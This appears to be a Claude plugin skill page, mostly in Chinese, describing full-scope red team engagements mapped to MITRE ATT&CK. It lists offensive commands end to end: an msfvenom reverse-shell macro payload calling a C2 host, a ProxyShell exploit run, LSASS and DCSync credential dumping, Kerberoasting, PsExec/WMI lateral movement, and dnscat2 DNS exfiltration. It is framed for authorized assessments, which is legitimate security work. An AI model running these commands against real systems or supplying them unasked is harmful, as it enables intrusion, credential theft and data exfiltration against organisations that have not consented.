Stats
Actions
Tags
Plans and executes full-scope red team engagements covering reconnaissance to exfiltration using MITRE ATT&CK TTPs to assess organizational detection and response capabilities.
How this skill is triggered — by the user, by Claude, or both
Slash command
/cybersecurity-skills-zh:conducting-full-scope-red-team-engagementThe summary Claude sees in its skill listing — used to decide when to auto-load this skill
全范围红队演练(Full-Scope Red Team Engagement)模拟真实世界的对手行为,覆盖网络杀伤链(Cyber Kill Chain)的所有阶段——从初始侦察到数据外泄——以评估组织的检测、预防和响应能力。与渗透测试(Penetration Testing)不同,红队行动优先注重隐蔽性、持久化和基于目标的场景,模拟高级持续性威胁(APT)。
全范围红队演练(Full-Scope Red Team Engagement)模拟真实世界的对手行为,覆盖网络杀伤链(Cyber Kill Chain)的所有阶段——从初始侦察到数据外泄——以评估组织的检测、预防和响应能力。与渗透测试(Penetration Testing)不同,红队行动优先注重隐蔽性、持久化和基于目标的场景,模拟高级持续性威胁(APT)。
根据威胁配置文件,将演练映射到特定 MITRE ATT&CK 战术和技术:
| 杀伤链阶段 | MITRE ATT&CK 战术 | 示例技术 |
|---|---|---|
| 侦察(Reconnaissance) | TA0043 | T1593 搜索开放网站/域名, T1589 收集受害者身份信息 |
| 资源开发 | TA0042 | T1583.001 获取基础设施:域名, T1587.001 开发能力:恶意软件 |
| 初始访问 | TA0001 | T1566.001 鱼叉式钓鱼附件, T1078 有效账户 |
| 执行 | TA0002 | T1059.001 PowerShell, T1204.002 用户执行:恶意文件 |
| 持久化 | TA0003 | T1053.005 计划任务, T1547.001 注册表运行键 |
| 权限提升 | TA0004 | T1068 利用漏洞提权, T1548.002 UAC 绕过 |
| 防御规避 | TA0005 | T1055 进程注入, T1027 混淆文件 |
| 凭据访问 | TA0006 | T1003.001 LSASS 内存, T1558.003 Kerberoasting |
| 发现 | TA0007 | T1087 账户发现, T1018 远程系统发现 |
| 横向移动 | TA0008 | T1021.002 SMB/Windows 管理共享, T1550.002 哈希传递 |
| 收集 | TA0009 | T1560 归档收集数据, T1213 来自信息存储库的数据 |
| 数据外泄 | TA0010 | T1041 通过 C2 信道外泄, T1048 通过替代协议外泄 |
| 影响 | TA0040 | T1486 加密数据以影响业务, T1489 停止服务 |
# 被动 DNS 枚举
amass enum -passive -d target.com -o amass_passive.txt
# 证书透明度日志搜索
python3 -c "
import requests
url = 'https://crt.sh/?q=%.target.com&output=json'
r = requests.get(url)
for cert in r.json():
print(cert['name_value'])
" | sort -u > subdomains.txt
# LinkedIn 员工枚举
theHarvester -d target.com -b linkedin -l 500 -f harvest_results
# 技术栈指纹识别
whatweb -v target.com --log-json=whatweb.json
# 泄露数据凭据搜索(已授权)
h8mail -t target.com -o h8mail_results.csv
红队演练常见的初始访问向量:
鱼叉式钓鱼(T1566.001):
# 生成带宏的载荷
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=c2.redteam.local LPORT=443 -f vba -o macro.vba
# 配置 GoPhish 活动
# 配置 SMTP 配置文件、带借口的电子邮件模板和着陆页
gophish --config config.json
外部服务利用(T1190):
# 扫描易受攻击的服务
nmap -sV -sC --script vuln -p 80,443,8080,8443 target.com -oA vuln_scan
# 利用已知 CVE(示例:ProxyShell CVE-2021-34473)
python3 proxyshell_exploit.py -t mail.target.com -e [email protected]
# 态势感知(T1082, T1016)
whoami /all
systeminfo
ipconfig /all
net group "Domain Admins" /domain
nltest /dclist:target.com
# 从 LSASS 收集凭据(T1003.001)
# 使用 Havoc C2 内置模块
dotnet inline-execute SafetyKatz.exe sekurlsa::logonpasswords
# Kerberoasting(T1558.003)
Rubeus.exe kerberoast /outfile:kerberoast_hashes.txt
# 通过 WMI 横向移动(T1047)
wmiexec.py domain/user:password@target-dc -c "whoami"
# 通过 PsExec 横向移动(T1021.002)
psexec.py domain/admin:[email protected]
定义并追求特定目标:
# DCSync 攻击(T1003.006)
secretsdump.py domain/admin:[email protected] -just-dc-ntlm
# 通过 DNS 外泄数据(T1048.003)
dnscat2 --dns "domain=exfil.redteam.com" --secret=s3cr3t
报告应包含:
| 指标 | 描述 |
|---|---|
| 平均检测时间(MTTD) | 从行动到 SOC 检测的平均时间 |
| 平均响应时间(MTTR) | 从检测到遏制的平均时间 |
| TTP 覆盖率 | 已执行技术中被检测到的百分比 |
| 目标达成率 | 已完成的预定目标百分比 |
| 驻留时间 | 红队维持访问而未被检测到的总时间 |
npx claudepluginhub killvxk/cybersecurity-skills-zhPlans and executes full-scope red team engagements across all cyber kill chain phases using MITRE ATT&CK-aligned TTPs to evaluate detection and response capabilities.
Plan and execute a comprehensive red team engagement covering reconnaissance through post-exploitation using MITRE ATT&CK-aligned TTPs to evaluate an organization's detection and response capabilities.
Plans and executes full-scope red team engagements from reconnaissance to post-exploitation using MITRE ATT&CK TTPs to evaluate detection and response capabilities. Useful for authorized security assessments.